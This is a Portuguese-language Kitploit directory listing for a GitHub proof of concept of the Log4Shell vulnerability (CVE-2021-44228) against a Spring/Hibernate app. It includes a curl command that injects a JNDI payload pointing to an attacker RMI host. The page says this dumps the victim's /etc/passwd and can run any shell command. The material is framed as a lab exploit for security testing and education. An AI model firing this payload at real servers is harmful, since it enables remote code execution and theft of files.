Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cve-2021-44228--spring-hibernate — CVE-2021-44228 POC - Spring / Hibernate | Kitploit
Ferramentas/GitHubGitHub/uint0/cve-2021-44228--spring-hibernate
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubuint0/cve-2021-44228--spring-hibernate

cve-2021-44228--spring-hibernate

CVE-2021-44228 POC - Spring / Hibernate

Ver Repositório
12há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2021-44228 POC - Spring / Hibernate

Esta POC utiliza Spring / Hibernate, no entanto uma abordagem semelhante de rmi -> desserialização poderia ser usada para desencadear qualquer vulnerabilidade de desserialização

TL;DR

root@kitploit:~
$ docker-compose up
$ curl -X POST -H 'Content-Type: text/plain' localhost:8080 --data-binary '${jndi:rmi://exploit:10000/a}'

Você deve ver o conteúdo do /etc/passwd da vítima aparecer nos logs do container attacker. Você pode substituir o comando no serviço exploit para executar qualquer comando shell na vítima.

Vítima

A vítima está executando um aplicativo Spring starter padrão com as dependências "Spring Data JPA" (para Hibernate), "Spring Web" e "H2" (como armazenamento de dados). Apenas 2 modificações foram feitas além disso.

  1. Removidos os testes
  2. Substituído o logger slf4j pelo vulnerável
log4j

Todas as dependências estão atualizadas. Não há flags mágicas habilitadas.

A vítima expõe um endpoint que aceita POST em / que registrará a requisição.

Exploit

O exploit depende de um fork do ysoserial usando o gerador de exploits Hibernate. Para que o exploit funcione com a versão mais recente do Hibernate, será necessário recompilar o ysoserial.

Baixar ferramenta